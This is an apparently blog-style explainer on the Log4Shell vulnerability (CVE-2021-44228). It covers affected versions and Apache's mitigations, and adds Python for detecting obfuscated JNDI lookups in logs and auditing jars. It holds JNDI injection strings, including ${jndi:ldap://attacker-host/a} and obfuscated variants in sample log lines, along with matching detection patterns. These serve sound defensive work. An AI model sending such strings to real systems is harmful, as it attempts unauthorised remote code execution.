The Internet is ablaze with talk about the Log4j vulnerability. Here are a few details that have been understood about the vulnerability so far:


  1. Apache Log4j is a logging utility
  2. A vulnerability in the Log4j logging library was publicly disclosed on Thursday the 9th of December, 2021 (it had been reported privately to Apache on the 24th of November)
  3. It has been assigned CVE-2021-44228 and is popularly known as Log4Shell
  4. Log4j 2 releases from 2.0-beta9 up to and including 2.14.1 are affected; 2.15.0 is the first fixed release (the old Log4j 1.x line does not have the JNDI lookup feature and is not affected by this CVE, though it is end-of-life)
  5. It was exploited as a zero day; the flaw was first reported by Chen Zhaojun of the Alibaba Cloud Security Team
  6. Log4j is the most popular Java logging library, with over 400,000 downloads from its GitHub site
  7. Nearly every large application uses a logging library to record errors and events
  8. Instead of writing their own logging code, most companies rely on open source logging libraries such as those published by the Apache Software Foundation
  9. Log4j has been reported as present in services and products from Twitter, Microsoft, Amazon, Minecraft, Steam, Apple iCloud and many, many more
  10. The vulnerability gives remote code execution when a specially crafted string such as ${jndi:ldap://attacker-host/a} ends up in a logged message: Log4j's message lookup feature resolves the ${jndi:...} expression, makes a JNDI request (LDAP, RMI, DNS and others) to the host named in the string, and can load and run a class returned by that server
  11. The attacker can therefore make the server fetch and execute malicious code and take control of it; any input that reaches a log statement (User-Agent headers, usernames, form fields, query parameters) is a potential injection point, and the attacker needs no authentication
  12. Apache has rated the vulnerability “Critical” with a base CVSS score of 10.0
  13. The Apache Software Foundation has since released a patched version, 2.15.0
  14. These are the mitigation measures as released by the Apache foundation:

a. In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. Note that Apache has since downgraded this to a partial mitigation, because some non-default configurations still perform lookups; treat it as a stop-gap, not a fix.

b. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m

c. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class (the same removal also works on 2.11 through 2.14.1, where the lookup lives in the same class). Remember that log4j-core is frequently bundled inside fat jars and wars (for example under BOOT-INF/lib or WEB-INF/lib); those nested copies must be unpacked, stripped and repackaged too, or the mitigation silently misses them.

d. Wherever possible, upgrade to Log4j v2.15.0 or later; the workarounds above only reduce exposure and leave the vulnerable code on the classpath.

15. You can identify a vulnerable remote server with the Log4Shell token offered by the open source web application CanaryTokens.org: the token is a ${jndi:...} string pointing at a hostname under the service's control, and if the target resolves it you receive an alert, which proves the lookup fired. Only test systems you are authorised to test.
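As an added example (this is not code from the original post or from the Log4j project), the following Python scans log lines for the lookup strings described in items 10 and 11. Real attackers rarely send the literal ${jndi: and instead hide it behind nested lookups (${lower:j}, ${upper:n}, and the ${x:-j} default-value syntax) that Log4j resolves innermost-first before the JNDI lookup runs, so the detector performs the same normalisation before matching. The sample access-log lines, the addresses 10.0.0.x and 198.51.100.23, and the function names normalize, find_jndi and scan are all this example's own constructions.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not from a real system). Line 1 is benign;
# lines 2-5 carry a JNDI lookup in a field an application is likely to log
# (User-Agent, query string), in plain and obfuscated forms.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:11 +0000] "GET /login HTTP/1.1" 200 77 "-" "${${lower:j}${upper:n}di:${lower:LDAP}://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:03:14:12 +0000] "GET /?q=${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.23:1099/x} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '10.0.0.9 - - [10/Dec/2021:03:14:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.23/ping}"',
]

# Inner lookups attackers nest to hide the literal "jndi": ${lower:X}, ${upper:X},
# and ${anything:-X} (the default-value syntax, which yields X when the lookup is
# undefined). Log4j resolves these innermost-first, so the detector does the same.
_INNER = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_TARGET = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z]+)://([^/}\s]+)", re.IGNORECASE)


def _resolve_inner(m: "re.Match") -> str:
    if m.group(1) is not None:
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return m.group(3)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups the way Log4j would, bounded so a hostile input cannot loop forever."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_inner, s)
        if new == s:
            break
        s = new
    return s


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """Return (scheme, host[:port]) if the line carries a JNDI lookup, else None."""
    norm = normalize(line)
    m = _TARGET.search(norm)
    if m:
        return (m.group(1).lower(), m.group(2))
    if _JNDI.search(norm):
        return ("?", "?")  # lookup present but the target did not parse; still worth an alert
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, scheme, target) for every line that contains a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit:
            hits.append((n, hit[0], hit[1]))
    return hits


if __name__ == "__main__":
    for n, scheme, host in scan(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI lookup via {scheme} -> {host}")
```

The normalisation step is what separates this from a plain grep for "jndi": lines 3 to 5 contain no such substring until the inner lookups are resolved. The callback targets it extracts (host and port per scheme) are the indicators to block at the egress firewall and to hunt for in DNS and proxy logs.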
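Also as an added example (not the post's or the Log4j project's own code), this Python audits jars for the affected version range from item 4 and for the JndiLookup class that mitigation (c) removes, descending into jars nested inside fat jars and wars, and performs that removal the way the zip command does. Because the real log4j-core artifact is not available offline, the script builds a constructed stand-in jar that contains only the two entries the audit reads (pom.properties and a placeholder JndiLookup.class); the file names, the BOOT-INF/lib layout and the function names is_vulnerable, audit, strip_jndi_lookup and run_demo are this example's own.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple

# Entries the audit looks at inside a log4j-core jar.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"

Finding = Tuple[str, Optional[str], bool, bool]  # (location, version, has JndiLookup, flagged)


def is_vulnerable(version: str) -> bool:
    """True for log4j-core 2.0-beta9 through 2.14.1; the 1.x line is not affected by this CVE."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?", version)
    if not m or int(m.group(1)) != 2:
        return False
    minor, patch, beta = int(m.group(2)), int(m.group(3) or 0), m.group(4)
    if beta is not None:
        return (minor, patch) == (0, 0) and int(beta) >= 9
    return (minor, patch) < (15, 0)


def audit(zf: zipfile.ZipFile, where: str) -> List[Finding]:
    """Report log4j-core found in this archive and in any jar nested inside it (fat jars, wars)."""
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_CLASS in names
    findings: List[Finding] = []
    if version is not None or has_jndi:
        # Flag when the lookup class is still present and the version is in range or unknown;
        # a jar that went through mitigation (c) no longer carries the class.
        flagged = has_jndi and (version is None or is_vulnerable(version))
        findings.append((where, version, has_jndi, flagged))
    for name in sorted(names):
        if name.endswith(".jar"):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                findings.extend(audit(inner, f"{where}!{name}"))
    return findings


def audit_path(jar_path: str) -> List[Finding]:
    with zipfile.ZipFile(jar_path) as zf:
        return audit(zf, jar_path)


def strip_jndi_lookup(jar_path: str) -> bool:
    """Mitigation (c) in Python: rewrite the jar without JndiLookup.class. Returns True if removed."""
    tmp = jar_path + ".tmp"
    with zipfile.ZipFile(jar_path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        with zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
            for item in src.infolist():
                if item.filename != JNDI_CLASS:
                    dst.writestr(item, src.read(item.filename))
    os.replace(tmp, jar_path)  # atomic swap, so a crash never leaves a half-written jar behind
    return True


def sample_log4j_core(version: str) -> bytes:
    """Constructed stand-in for log4j-core: only the entries the audit reads, no real classes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a compiled class
    return buf.getvalue()


def run_demo(directory: Optional[str] = None) -> Tuple[List[Finding], List[Finding], bool, List[Finding]]:
    """Write a plain jar and a fat jar, audit both, strip the plain one, and audit it again."""
    if directory is None:
        with tempfile.TemporaryDirectory() as d:
            return run_demo(d)
    plain = os.path.join(directory, "log4j-core-2.14.1.jar")
    with open(plain, "wb") as f:
        f.write(sample_log4j_core("2.14.1"))
    fat = os.path.join(directory, "app.jar")  # Spring Boot style layout with a nested log4j-core
    with zipfile.ZipFile(fat, "w") as z:
        z.writestr("BOOT-INF/lib/log4j-core-2.14.1.jar", sample_log4j_core("2.14.1"))
    before_plain, before_fat = audit_path(plain), audit_path(fat)
    removed = strip_jndi_lookup(plain)
    return before_plain, before_fat, removed, audit_path(plain)


if __name__ == "__main__":
    before_plain, before_fat, removed, after_plain = run_demo()
    for finding in before_plain + before_fat + after_plain:
        print(finding)
    print("removed JndiLookup.class:", removed)
```

The nested-jar descent is the part a one-line zip command cannot do: the fat jar reports its bundled copy as app.jar!BOOT-INF/lib/log4j-core-2.14.1.jar, and stripping it would require repackaging the outer archive as well. An inventory built from findings like these, rather than from package manifests alone, is what tells you which hosts still need the 2.15.0 upgrade.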

What has been your experience with the Log4Shell exploit?
